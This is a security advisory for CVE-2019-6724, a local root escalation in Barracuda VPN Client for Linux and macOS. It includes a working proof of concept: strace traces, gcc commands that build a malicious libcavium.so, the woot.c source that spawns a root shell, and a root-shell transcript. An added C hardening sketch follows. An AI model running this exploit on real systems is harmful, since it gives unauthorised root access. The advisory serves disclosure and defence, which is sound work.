ASA-2019-00157 – Barracuda: Privilege Escalation in VPN Client


Allele Security Alert

ASA-2019-00157

Identifier(s)

ASA-2019-00157, CVE-2019-6724

Title

Privilege Escalation in VPN Client

Vendor(s)

Barracuda

Product(s)

Barracuda VPN Client for macOS
Barracuda VPN Client for Linux

Affected version(s)

Barracuda VPN Client prior to version 5.0.2.7 for Linux
Barracuda VPN Client prior to version 5.0.2.7 for macOS

Fixed version(s)

Barracuda VPN Client version 5.0.2.7 for Linux
Barracuda VPN Client version 5.0.2.7 for macOS

Proof of concept

Yes

Description

The barracudavpn component of the Barracuda VPN Client prior to version 5.0.2.7 for Linux, macOS, and OpenBSD runs as a privileged process and can allow an unprivileged local attacker to load a malicious library, resulting in arbitrary code executing as root.

Technical details

The barracudavpn binary attempts to load a non-existent library named libcavium.so from /opt/phion/libs64/engines.

[root@localhost ~]# strace -u user1 -o /tmp/vpn.trace -ff -s 1000 /usr/local/bin/barracudavpn
[root@localhost ~]# grep \\.so /tmp/vpn.trace
open("/opt/phion/libs/engines/libcavium.so", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)

The directory from which it tries to load the library can be influenced through the OPENSSL_ENGINES environment variable.

[root@localhost ~]# export OPENSSL_ENGINES=/foobar
[root@localhost ~]# timeout 10s strace -u user1 -ff /usr/local/bin/barracudavpn 2>&1|grep '\.so'
open("/foobar/libcavium.so", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)

Then, achieving privilege escalation is straightforward.

[user1@localhost ~]$ mkdir foobar
[user1@localhost ~]$ gcc -fPIC -Wall -o woot.o -c woot.c
[user1@localhost ~]$ gcc -Wall -shared -Wl,-soname,libcavium.so -Wl,-init,woot -o foobar/libcavium.so woot.o
[user1@localhost ~]$ export OPENSSL_ENGINES=foobar

The content of woot.c:

#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

void woot(){
    setreuid(0,0);
    execl("/bin/sh","/bin/sh",NULL);
}

After building the malicious library and setting the environment variable, simply running /usr/local/bin/barracudavpn results in privilege escalation.

[user1@localhost ~]$ id
uid=1000(user1) gid=1000(user1) groups=1000(user1) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[user1@localhost ~]$ /usr/local/bin/barracudavpn
sh-4.2# id
uid=0(root) gid=1000(user1) groups=1000(user1) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
sh-4.2#
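
A hardening sketch for the pattern described above, added here as an example (it is not code from Barracuda, the researcher or this advisory): a privileged program drops OPENSSL_ENGINES when it runs elevated and accepts a library directory only if unprivileged users cannot modify any part of its path. The function names and the /usr/lib/engines-example path are assumptions made for illustration.

```c
#define _XOPEN_SOURCE 700
#include <limits.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Nonzero when the process has more privilege than the user who started it. */
int runs_elevated(void)
{
    return getuid() != geteuid() || getgid() != getegid();
}

/* Accept a library directory only if it is absolute and, once resolved, every
 * component from "/" down is root-owned and not group/other-writable. */
int dir_is_trusted(const char *path)
{
    char real[PATH_MAX], part[PATH_MAX];
    struct stat st;
    if (path == NULL || path[0] != '/' || realpath(path, real) == NULL)
        return 0;   /* relative paths resolve against the caller's cwd */
    for (size_t i = 0, len = strlen(real); i <= len; i++) {
        if (real[i] != '/' && real[i] != '\0')
            continue;
        size_t n = i ? i : 1;           /* i == 0 is the root directory */
        memcpy(part, real, n);
        part[n] = '\0';
        if (stat(part, &st) != 0 || !S_ISDIR(st.st_mode) ||
            st.st_uid != 0 || (st.st_mode & (S_IWGRP | S_IWOTH)))
            return 0;
    }
    return 1;
}

/* Call before any crypto initialisation. Returns 1 if the variable was removed. */
int sanitize_engine_env(int elevated)
{
    if (!elevated || getenv("OPENSSL_ENGINES") == NULL)
        return 0;
    return unsetenv("OPENSSL_ENGINES") == 0;
}

int main(void)
{
    sanitize_engine_env(runs_elevated());
    /* Constructed placeholder path standing in for a compiled-in default. */
    return dir_is_trusted("/usr/lib/engines-example") ? 0 : 1;
}
```

With this policy, both the relative "foobar" value and a directory created under a user-writable parent are rejected, and the invoking user's OPENSSL_ENGINES never reaches the library loader in a set-uid run.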

Credits

Rich Mirch

Reference(s)

CVE-2019-6724 : Barracuda VPN Client Privilege Escalation on Linux and macOS
https://blog.mirch.io/2019/02/14/cve-2019-6724-barracuda-vpn-client-privilege-escalation-on-linux-and-macos/

Release Notes – Barracuda VPN Client for macOS
https://campus.barracuda.com/product/networkaccessclient/doc/78154147/release-notes-barracuda-vpn-client-for-macos/

Release Notes – Barracuda VPN Client for Linux
https://campus.barracuda.com/product/networkaccessclient/doc/78154149/release-notes-barracuda-vpn-client-for-linux/

CVE-2019-6724.sh
https://github.com/mirchr/security-research/blob/master/vulnerabilities/CVE-2019-6724.sh

CVE-2019-6724
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6724

CVE-2019-6724
https://nvd.nist.gov/vuln/detail/CVE-2019-6724

If there is any error in this alert or you would like a comprehensive analysis, let us know.

Last modified: March 27, 2019

We are not responsible for any data loss, device corruption or any other type of issue due to the use of any information mentioned in our security alerts.